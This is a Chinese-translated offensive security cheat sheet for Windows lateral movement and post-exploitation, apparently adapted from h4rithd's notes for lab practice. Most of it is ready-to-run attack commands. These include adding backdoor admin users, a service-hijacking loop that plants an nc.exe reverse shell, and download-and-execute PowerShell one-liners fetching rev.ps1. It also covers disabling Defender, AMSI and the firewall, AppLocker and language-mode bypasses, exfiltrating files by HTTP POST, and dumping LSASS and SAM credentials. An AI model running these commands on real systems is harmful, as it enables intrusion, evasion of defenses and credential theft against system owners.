Windows常用命令-横向移动-h4rithd-2024.04.03版本

笔记说明：

该笔记是国外进攻性爱好者 h4rithd 在 gitbook 上记录的备忘笔记，我整体翻译了注释的内容，并根据个人打靶学习情况，增加或删除了一部分内容，至此放置博客上留作后续复习使用，以及方便各位浏览到我博客的安全爱好者参考使用。

横向运动

01.常用命令

01.1 操作系统枚举

## ------------------| 获取基本详细信息
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
whoami /all
[System.Environment]::OSVersion.Version
Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayerVersion
(Get-ItemProperty "HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion").ReleaseId

## ------------------| 获取环境路径
##[Powershell]
Get-ChildItem Env: | ft Key,Value
dir env:

## ------------------| Get .Net Version (cmd/ps)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

## ------------------| 获取系统架构 32 or 64 
##[Powershell]
$env:PROCESSOR_ARCHITECTURE
[Environment]::Is64BitProcess
[Environment]::Is64BitOperatingSystem
##[cmd]
set processor

## ------------------| 提取操作系统补丁和更新
wmic qfe 

## ------------------| 列出所有已安装的带有修补程序的软件 (
wmic product get name, version, vendor

## ------------------| 列出所有磁盘
mountvol
wmic logicaldisk get caption,description,providername

## ------------------| 列出防火墙状态和当前配置
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all

01.2 用户枚举

## ------------------| Get current username
echo %USERNAME% || whoami
$env:username

## ------------------| List user info
net user <UserName>

## ------------------| 获取用户配置文件（主）目录 
write-host $env:USERPROFILE

## ------------------| List user 特权
whoami /priv
whoami /groups

## ------------------| List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

## ------------------| 列出登录要求
net accounts

## ------------------| List all local groups
net localgroup
Get-LocalGroup | ft Name

## ------------------| 获取有关组的详细信息
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

## ------------------| 获取域控制器
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

## ------------------| Get Domain Users
net view /domain
net view /domain:DomainName

• 创建用户

## ------------------| Local account
## Crearte local user
net user /add harith Password@123
## Add to the admin group
net localgroup administrators harith  /add
## Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith  /add

## ------------------| Domain account
## 此命令只能在Windows域控制器上使用
net user h4rithd Passw0rD$ /add /domain

# Check members on 
net group "Exchange Windows Permissions"

# Add members to 
net group "Exchange Windows Permissions" /add h4rithd

• 以其他用户身份登录

## ------------------| If you have RDP
runAs /user:h4rithd cmd.exe
powershell.exe Start-Process cmd.exe -Verb runAs /user:h4rithd

## ------------------| Create Creds Object
$env:ComputerName
$user = "ComputerName\USERNAME" # It's better to use with $user = "<hostname>\<username>"
$pass = "PASSWORD"
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($user,$secStringPass)
## OR -----------------------------------------------------------------------------------------------------
$pass = convertto-securestring -AsPlainText -Force -String "PASSWORD"
$Creds = New-Object -TypeName System.Management.Automation.PSCredential - ArgumentList "ComputerName\USERNAME",$pass

## ------------------| 将Creds对象用于活动
### Get Hostname using hostname command
Invoke-Command -Credential $Creds -ComputerName <IP/LOCALHOST or Hostname> -ScriptBlock { whoami }
Enter-PSSession -Credential $Creds -ComputerName <IP/LOCALHOST or Hostname>
Start-Process -Credential $Creds -FilePath Powershell -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.22/rev.ps1')"      

## 双跃点访问（身份验证CredSSP）
Invoke-Command -ComputerName helpline -Authentication CredSSP -credential $cred -ScriptBlock { whoami }

• 更改密码

$pass = ConvertTo-SecureString 'Pas$word!' -asPlainText -Force
Set-DomainUserPassword Herman -AccountPassword $pass -Verbose

• 存储的凭证 | 已保存的积分

cmdkey /list
runas /savecred /user:<USERNAME> C:\<PATH>\shell.exe

01.3 网络枚举

## ------------------| List all listening ports
netstat -ano | findstr /i listen
netstat -anop tcp

## ------------------| List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

## ------------------| 列出当前路由表
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## ------------------| List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## ------------------| 列出所有网络共享
net share
powershell Find-DomainShare -ComputerDomain domain.local

## ------------------| SNMP配置
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

• 打开 RDP

## ------------------|  启用RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

## ------------------|  通过RDP启用身份验证
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1    

## ------------------|  通过Windows防火墙启用RDP
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

## ------------------|  Using MSF
use post/windows/manage/enable_rdp
set Username h4rithd
set Password Password123!
set SESSION 1
info
run

## ------------------| Login to the RDP
rdesktop -g 1920x1080 <IP>

• Ping 扫描

## ------------------| Genaral
1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl

## ------------------| 平行ping清扫器
workflow ParallelSweep { foreach -parallel -throttlelimit 4 ($i in 1..255) {ping -n 1 -w 100 10.0.0.$i}}; ParallelSweep | Select-String ttl

## ------------------| 带操作系统检测的多子网ping清除器
0..10 | % { $a = $_; 1..255 | % { $b = $_; ping -n 1 -w 10 "10.0.$a.$b" | select-string TTL | % { if ($_ -match "ms") { $ttl = $_.line.split('=')[2] -as [int]; if ($ttl -lt 65) { $os = "Linux" } ElseIf ($ttl -gt 64 -And $ttl -lt 129) { $os = "Windows" } else { $os = "Cisco"}; write-host "10.0.$a.$b OS: $os"; echo "10.0.$a.$b" >> scan_results.txt }}} }     

• 导出 DNS 区域

Get-DNSServerZone
Export-DnsServerZone -Name localnet.domain -FileName dns-export.txt
## File was exported to C:\Windows\system32\dns\dns-export.txt

• 回复者[责备]

wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Inveigh.ps1')
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y  

01.4 进程/服务枚举

## ------------------| List all Process 
Get-Process -name firefox
tasklist /v | findstr smss
ps | findstr smss

## ------------------| List all services
Get-Service
sc query state=all
get-wmiobject win32_service
## If all above commands are failed; try following
Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
Get-ChildItem . | select name
Get-ChildItem . | where-object { $_.Name -like '*EnterServiceNameHere*' 

## ------------------| Processes are running as "system"
tasklist /v /fi "username eq system"

## ------------------| Kill process
taskkill /f /im:filename.exe

## ------------------| 计划的任务
### List all tasks
schtasks /query /fo LIST /v
### Run task
schtasks /RUN /RN "\NameHere"

## ------------------| Start Service (Stop,Restart)
## 使用上述方法获取显示名称
Stop-Service "Ubiquiti UniFi Video"
Start-Service "Ubiquiti UniFi Video"
net stop EnterServiceNameHere
net start EnterServiceNameHere
sc.exe stop EnterServiceNameHere
sc.exe start EnterServiceNameHere

## ------------------| 检查基本服务属性
Get-Service nscp | fl *

## ------------------| List loaded assemblies
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname

## ------------------| List only running services
Get-Service | where {$_.Status -eq "Running"} 

wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V "''"    

• 可修改的服务

## ------------------| 修改UsoSvc服务bin路径
sc.exe config UsoSvc binpath="cmd.exe /c powershell -EncodedCommand SQBFAFgAKABOA.....ApAA=="    

## ------------------| Restart the UsoSvc service 
sc.exe stop UsoSvc 
sc.exe start UsoSvc 

• 转储过程

## ------------------| 使用rundll32转储进程 
get-process 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> <PATH-TO-SAVE-FILE> full
## Dumping Lsass Without Mimikatz]
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\Documents\lsass.dmp

## ------------------| 使用ProcDump的转储进程
./procdump.exe -accepteula -ma <PID>

• 列出已安装的程序

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

01.5 注册表枚举

• 服务注册表枚举

## ------------------| 检查用户是否具有FullControl
accesschk.exe "<USER>" -kwsu HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
## or -----------------------------------------------------------
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services; ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}                                      

## ------------------| 找到一个我可以重新启动的系列
$cmd = "C:\inetpub\wwwroot\uploads\nc.exe 10.10.14.187 444 -e powershell.exe"\
# 创建服务列表
$otp = ./accesschk.exe "Hector" -kvuqsv hklm:\System\CurrentControlSet\Services
$services = $otp.Split([Environment]::NewLine)
# 通过每项服务Lopp
foreach($service in $services) {
    # 如果当前线路不是服务，请跳过它
    if(!$service.StartsWith("RW HKLM")) {
        continue
    }
    # 验证线路是否确实是一项服务
    $name = $service.Split("\\")[-1].Split([Environment]::NewLine)[0]
    $s = Get-Service -Name $name -ErrorAction SilentlyContinue
    if(!$s) {
        continue
    }
    echo $service
    $serv = $service.Split(" ")[-1].Split([Environment]::NewLine)[0]
    echo $serv
    # 试图利用该服务进行攻击：
    # 1.将服务的二进制路径更改为$cmd
    # 2.重新启动服务
    if($s.Status -eq 'Running') {
        reg add $serv /v ImagePath /t REG_EXPAND_SZ /d "$cmd" /f >a.txt
        if((Get-Service -Name $name).Status -eq 'Running') {
            Get-Service -Name $name | Stop-Service -ErrorAction SilentlyContinue
            Write-Host "[STOP] "$name
        }
    } elseif ($s.Status -eq 'Stopped') {
        reg add $serv /v ImagePath /t REG_EXPAND_SZ /d "$cmd" /f >a.txt
        if((Get-Service -Name $name).Status -eq 'Stopped') {
            Get-Service -Name $name | Start-Service -ErrorAction SilentlyContinue
            Write-Host "[START] "$name
        }
    }
}

01.6 文件枚举

## ------------------| 列出所有文件，包括隐藏的文件
dir -force
dir /b/s C:\ flag.txt
where /R C:\ flag.txt
gci -r . user.txt
gci -recurse | select FullName
gci -recurse C:\Users\ user.txt
Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

## ------------------| 获取文件流数据
cmd /c dir /r
Get-Item <FileName> -Stream *
Get-Content <FileName> -Stream <StreamName>

## ------------------| 列出所有仅具有扩展名的文件
gci -recurse -include *.* | select FullName

## ------------------| 替换某些单词（sed）
((cat ..\path\to\file.txt -Raw) -replace 'foo', 'bar') | sc -path ..\path\to\new\file.txt 

## ------------------| 列出所有已安装的驱动程序/版本
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

• 高级搜索

## ------------------| 搜索文件内容
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

## ------------------| 搜索具有特定文件名的文件
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

## ------------------| 搜索文件中的字符串
IWR -Uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1" -OutFile "Find-Strings.ps1"
.\Find-Strings.ps1 -stopAt "5"
.\Find-strings.ps1 -Path "$Env:TMP" -String "pass=|passwd=|password="
.\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "[^$]password="

## ------------------| 在SYSVOL中查找GPP密码
dir "C:\ProgramData\Microsoft\Group Policy\History\"
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

## ------------------| 搜索Windows自动登录
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | findstr "DefaultUserName DefaultDomainName DefaultPassword"
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 

## ------------------| 在注册表中搜索注册表项名称和密码
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

## ------------------| 搜索SNMP参数
REG QUERY "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 

## ------------------| 搜索Putty明文代理凭据
REG QUERY "HKCU\Software\SimonTatham\PuTTY\Sessions"

## ------------------| 搜索VNC凭据
REG QUERY "HKCU\Software\ORL\WinVNC3\Password"
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

REG QUERY HKLM /f password /t REG_SZ /s
REG QUERY HKCU /f password /t REG_SZ /s

## ------------------| 搜索不安全的文件权限（选中“世界可写”）
### Tool : https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uws "Everyone" "C:\Program Files"

## ------------------| 备份便笺
### Win 10 New (Version 1607)
cd C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
### Win 10/7/8 (Version 1511)
cd C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Sticky Notes
## copy all plum.* files; then use sqlite to extrack

• 弱权限

## ------------------| File\Folder
icacls "C:\Program Files (x86)\*" 2>null | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"     
icacls "C:\Program Files\*" 2>null | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"

## ------------------| Service 
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"     
icacls "C:\Program Files (x86)\*" 2>null | findstr "BUILTIN\Users:(I)(F)"
icacls "C:\Program Files\*" 2>null | findstr "BUILTIN\Users:(I)(F)"

• 设置/检查权限

## ------------------| Check
Get-ACL folder-or-file-name | FL *
Get-ACL root.txt | FL AccessToString

## ------------------| 设置完全控制
cacls root.txt /t /e /p UserName:F

## ------------------| 从ACL中删除用户
cacls root.txt /e /r UserName

#---------------- cacls命令帮助
# /e    编辑ACL而不是替换它。
# /t    更改当前目录和所有子目录中指定文件的ACL。
# /p user:<perm> 替换指定用户的访问权限，包括以下有效的权限值：
#  |->   n - None
#  |->   r - Read
#  |->   w - Write
#  |->   c - Change (write)
#  |->   f - Full control

## ------------------| 搜索不安全的文件权限（选中“世界可写”）
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

• 枚举快捷方式 ( .lnk)

$Wscript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
$Wscript.CreateShortcut($shortcut)

• 压缩并解压 zip 文件

## ------------------| 压紧
Compress-Archive -LiteralPath <PathToFiles> -DestinationPath <PathToDestination>.zip            

## ------------------| 提取/解压缩
Expand-Archive -LiteralPath <PathToZipFile>.zip -DestinationPath <PathToDestination>

01.7 防火墙/防御者

01.7.1 防火墙

## ------------------| 列出防火墙状态和当前配置
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all

## ------------------| 列出防火墙规则
Get-NetFirewallPortFilter
Get-NetFirewallRule
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow

## ------------------| 添加防火墙规则以打开3306端口
netsh advfirewall firewall add rule name"forward_port_rule" protocol=TCP dir=in localip=<compromised_ip> localport 3306 action=alow

## ------------------| 通过cmd禁用Windows 7上的防火墙
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f

## ------------------| 通过Powershell禁用Windows 7上的防火墙
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

## ------------------| 通过cmd禁用任何窗口上的防火墙
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

## ------------------| 启用（psexec）对$ADMIN C$，IP$（Windows管理共享）的访问
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

## ------------------| 列出防火墙的阻止端口
powershell -c "$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports;$f"
powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}}, @{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}}, @{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile, Direction, Action"

01.7.2 防病毒和检测|禁用防御者

## ------------------| Check Defender Status
Get-MpComputerStatus

## ------------------| 检查Defender排除列表
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
Get-MpPreference | Select-Object -Property ExclusionPath | Format-Table -AutoSize

## ------------------| 禁用Defender
cd "C:\Progra~1\Windows Defender"
.\mpcmdrun.exe -RemoveDefinitions -All

## ------------------| 禁用扫描所有下载的文件和附件，禁用AMSI（被动）
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

## ------------------| 禁用AMSI（设置为0以启用）
Set-MpPreference -DisableScriptScanning 1 

## ------------------| 排除文件夹、扩展名或进程
Add-MpPreference -ExclusionPath "C:\Windows\Temp" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Temp\h4rithd" -Force
Set-MpPreference -ExclusionProcess "mimikatz.exe", "winPEAS.exe" -Force
Add-MpPreference -ExclusionExtension "exe" -Force

## ------------------| 删除签名（如果存在Internet连接，则会再次下载）：
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All

01.8 默认位置

## ------------------| Powershell默认位置
[x86] C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
[x64] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[x64] C:\windows\sysnative\windowspowershell\v1.0\powershell.exe

## ------------------| 默认可写文件夹
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

## ------------------| unattend.xml中的密码
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

## ------------------| 便笺密码
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite   

## ------------------| Powershell History
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

• 公开可写目录（适用于任何用户）

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\system32\spool\drivers\color
C:\Users\PublicPort Forward
C:\Users\Public\Documents
C:\Windows\tracing
C:\Windows\Tasks
C:\Windows\Temp
C:\programdata

01.9 策略绕过

• PowerShell执行策略 绕过

## ------------------| 检查/设置执行策略状态
Set-ExecutionPolicy RemoteSigned     # 将策略设置为RemoteSigned。
Set-ExecutionPolicy Unrestricted     # 将策略设置为“无限制”。
Get-ExecutionPolicy                  # 验证执行策略的当前设置。
Get-ExecutionPolicy -List | Format-Table -AutoSize

## ------------------| How to bypass
## 0) 如果你有evil-winrm访问权限；将rev.ps1文件复制到当前目录。然后
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
rev.ps1
menu

## 1) 将脚本复制并粘贴到交互式PowerShell控制台

## 2) 在中从文件和管道读取脚本到PowerShell标准
Get-Content rev.ps1 | PowerShell.exe -noprofile -
type rev.ps1 | PowerShell.exe -noprofile -

## 3) 从URL下载脚本并使用Invoke-Expression执行
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://<IP>/rev.ps1')"

## 3) 使用“绕过”执行策略标志
PowerShell.exe -ExecutionPolicy Bypass -File .\rev.ps1

• 绕过App Locker组策略

## ------------------| 检查应用程序锁定器状态
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

## ------------------| 绕过|将文件移动到以下路径
C:\Windows\Temp 
C:\Windows\Tasks 
C:\windows\tracing
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
C:\Windows\System32\Tasks_Migrated # 在执行Windows 10的版本升级后

## ------------------| 使用Powerview绕过
cp /opt/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 .
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Invoke-ReflectivePEInjection.ps1')  
$PEBytes = [IO.File]::ReadAllBytes('full\path\for\application.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes
## Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

## ------------------| More info
https://github.com/api0cradle/UltimateAppLockerByPassList

• PowerShell约束语言模式 绕过。

## ------------------| 是否验证已启用约束语言模式？
$ExecutionContext.SessionState.LanguageMode

## ------------------| Methord 01
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/rev.ps1')

## ------------------| Methord 02
## 您可以在函数内部运行命令，如->函数测试｛whoami｝和该equel to&｛whuami｝ 
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
echo -e "Invoke-PowerShellTcp -Reverse -IPAddress <HostIP> -Port 4545" >> rev.ps1
python3 -m http.server 80
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0   
&{ powershell -enc JABzAG0...Sad== }

## ------------------| Using PsBypassCLM
wget https://github.com/h4rithd/PrecompiledBinaries/blob/main/PSBypassCLM/PsBypassCLM.exe
### Execute
### Place the binary in C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.38 /rport=4545 /U C:\Windows\Tasks\PsBypassCLM.exe

• UAC绕过

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

## Bypasing
https://github.com/hfiref0x/UACME
https://docs.h4rithd.com/windows/privilageesc-windows#01.-common-tricks    

01.10 上传/下载/执行

• 上传文件。

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))     
Invoke-WebRequest -Uri http://10.10.14.25:443 -Method POST -Body $b64

## Download file with netcat
echo <base64> | base64 -d -w 0 > bloodhound.zip

## ------------------| 后台智能传输服务（BITS）
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql   

• 下载文件

## ------------------| 旧版本（支持任何版本）
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.63/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| 新版本（别名IWR）
powershell -c "Invoke-WebRequest http://10.10.14.26/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| 在内存中执行（别名IEX）
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/revshell.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/revshell.ps1 | iex"

## ------------------| Internet Explorer的首次运行错误（-useBasicParsing）
powershell -c "IWR -useBasicParsing http://10.10.14.26/nc.exe -o C:\Users\Public\nc.exe"
### 如果您有管理员访问权限，您可以禁用Internet Explorer的首次运行自定义
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f http://10.10.14.26/nc.exe C:\Users\Public\nc.exe

## ------------------| Using Curl
powershell curl http://10.10.14.11/rev.ps1

## ------------------| 后台智能传输服务（BITS）
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe" 

• 执行文件

## ------------------| Remote
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/SharpHound.ps1')

## ------------------| Local
.\rev.ps1
Import-Module .\rev.ps1

01.11 编码/解码

• 编码有效负载

## ------------------| Encode the payload 
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0   

## ------------------| Run the payload
powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==

• 将文件编码为 base64

## ------------------| Method I
powershell -c [convert]::ToBase64String((cat C:\windows\system32\license.rtf -Encoding byte))

## ------------------| Method II
certutil -encode C:\windows\system32\license.rtf license-b64.out

## ------------------| Method III
$fc = Get-Content "file name.txt"
$fc
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)

• 解密安全密码 ( SecureString)

## ------------------| From SecureString.xml
$file = Import-CliXml -Path string.xml
$file.GetNetworkCredential().Password
$file.GetNetworkCredential().Flag

## ------------------| 
$pw = gc admin-pass.xml | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential("Administrator", $pw)
$cred.GetNetworkCredential() | fl * 

## ------------------| 
$user = "USERNAME"
$pass = "PASSWORD" 
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$secStringPass)
$cred | fl
$cred.GetNetworkCredential() | fl     

01.12 转储凭证

• 转储SAM和SYSTEM文件

REG SAVE HKLM\SYSTEM SYSTEM
REG SAVE HKLM\SAM SAM

# Get hashes
impacket-secretsdump -sam SAM -system SYSTEM local

impacket-secretsdump -sam SAM -system SYSTEM -history local 

• 使用Out-Minidump.ps1

wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1
IEX(New-Object Net.Webclient).DownloadString('http://<IP>/Out-Minidump.ps1')
Get-Process lsass | out-minidump

• 使用过程转储

## ------------------| Get PID
tasklist | findstr /i lsas

## ------------------| Dump to file
procdump64.exe -accepteula -ma <PID> lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

## ------------------| Extract hashes
pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords"

• 与Dumpert

wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.dll
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.exe

.\Outflank-Dumpert.exe
rundll32.exe C:\Windows\temp\Outflank-Dumpert.dll,Dump

• 使用 Avast 的AvDump

## ------------------| Location
C:\Program Files\Avast Software\Avast\AvDump.exe

## ------------------| Download 
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x86/AvDump.exe
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x64/AvDump.exe

## ------------------| Execute
